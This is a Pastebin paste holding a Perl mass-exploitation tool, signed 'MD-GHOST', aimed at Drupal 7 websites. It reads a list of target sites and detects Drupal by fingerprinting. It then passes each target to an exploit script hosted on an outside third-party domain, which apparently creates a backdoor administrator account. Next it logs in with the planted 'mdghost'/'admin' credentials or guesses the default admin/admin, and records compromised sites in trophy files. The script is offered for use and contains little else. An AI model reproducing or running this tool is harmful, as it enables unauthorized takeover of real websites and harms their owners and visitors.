Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #usr/bin/perl
- #coded By MD-GHOST
- use Term::ANSIColor;
- use HTTP::Request;
- use LWP::UserAgent;
- use IO::Select;
- use HTTP::Response;
- use Term::ANSIColor;
- use HTTP::Request::Common qw(POST);
- use HTTP::Request::Common qw(GET);
- use Win32::Console::ANSI;
- system ('cls');
- $logo =('
- ____ ____ _ _ ____ _ _
- | _ \| _ \| | | | _ \ / \ | |
- | | | | |_) | | | | |_) / _ \ | |
- | |_| | _ <| |_| | __/ ___ \| |___
- |____/|_| \_ ___/ |_| /_/ \_\_____|
- _______ ______ _ ___ ___ _____ _____ ____
- | ____\ \/ / _ \| | / _ \_ _|_ _| ____| _ \
- | _| \ /| |_) | | | | | | | | | | _| | |_) |
- | |___ / \| __/| |__| |_| | | | | | |___| _ <
- |_____/_/\_\_| |_____\___/___| |_| |_____|_| \_\
- [+] coded By MD-GHOST -_-[+]
- [+] Greetz To All My Brothers [+]
- ');
- print colored ("$logo",'yellow');
- open(tarrget,"<$ARGV[0]") or die "WTF where is your list\n";
- while(<tarrget>){
- chomp($_);
- $site = $_;
- if($site !~ /http:\/\//) { $site = "http://$site/"; };
- efrez();
- }
- sub efrez($site){
- $ua = LWP::UserAgent->new(keep_alive => 1);
- $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
- $ua->timeout (10);
- my $efreez = $ua->get("$site")->content;
- if($efreez =~/\/modules\/system\/system.menus.css|\/sites\/default\/files\/|<meta name=\"Generator\" content=\"Drupal 7/) {
- print colored("[DRUPAL] $site",'white on_blue'),"\n\n\n";
- fuckdrupal();
- open(save, '>>Drupal.txt');
- print save "$site\n";
- close(save);
- }else{
- print "\n[UNKNOWN] $site\n";
- }
- }
- ###################################################################################################################
- ####################################################################################################################
- ######################################### DRUPAL ##################################################################
- ####################################################################################################################
- sub fuckdrupal(){
- $ua = LWP::UserAgent->new(keep_alive => 1);
- $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ua->timeout (20);
- # check the link of the exploit or you can download script from here : http://pastebin.com/wPAbtyJ4 and you upload it on you one shell :)
- $drupalink = "http://www.lasmarionetasdeirene.com/a.php";
- my $exploit = "$drupalink?url=$site&submit=submit";
- my $checkk = $ua->get("$exploit")->content;
- if($checkk =~/Success!/) {
- print colored ("[DRUPAL EXPLOIT]",'white on_red');
- print " ............... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold green');
- print "VULN";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- print "[WAIT I WILL MAKE SURE ABOUT USER AND PASSWORD]\n";
- # // here to test the user name and the password if the website has been really fucked or not :p
- $admin ="mdghost";
- $pass ="admin";
- $wp = $site . '/user/login';
- $red = $site . '/user/1';
- print "$wp\n";
- $brute = POST $wp, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in', location => $red];
- $response = $ua->request($brute);
- $stat = $response->status_line;
- if ($stat =~ /302/){
- print colored ("[BOOM] $site => User | $admin Password | $pass",'white on_green'),"\n";
- open(save, '>>fucked by MD-GHOST.txt');
- print save "Success MD-GHOST ! $site | username : mdghost | pass: admin\n";
- close(save);
- }
- elsif ($stat =~ /404/){
- print "[NOT DRUPAL] .................. [ERROR]\n";
- }
- }else{
- # // here to test user: admin and password : admin on the panel admin
- print "[TRYING WITH USER AND PASSWORD ADMIN]\n";
- $admin="admin";
- $pass ="admin";
- $dr = $site . '/user/login';
- $brute = POST $dr, [name => $admin, pass => $pass, form_build_id =>'', form_id => 'user_login',op => 'Log in'];
- $response = $ua->request($brute);
- $stat = $response->status_line;
- if ($stat =~ /302/){
- print colored ("[BOOM] $site=> User | $admin Password | $pass",'white on_green'),"\n";
- open(save, '>>fucked.txt');
- print save "Success MD-GHOST ! $site | username : $admin | pass: $pass\n";
- close(save);
- }else{
- print "[DRUPAL] ...................... ";
- print color('bold white');
- print "[";
- print color('reset');
- print color('bold red');
- print "ERROR";
- print color('reset');
- print color('bold white');
- print "] \n";
- print color('reset');
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement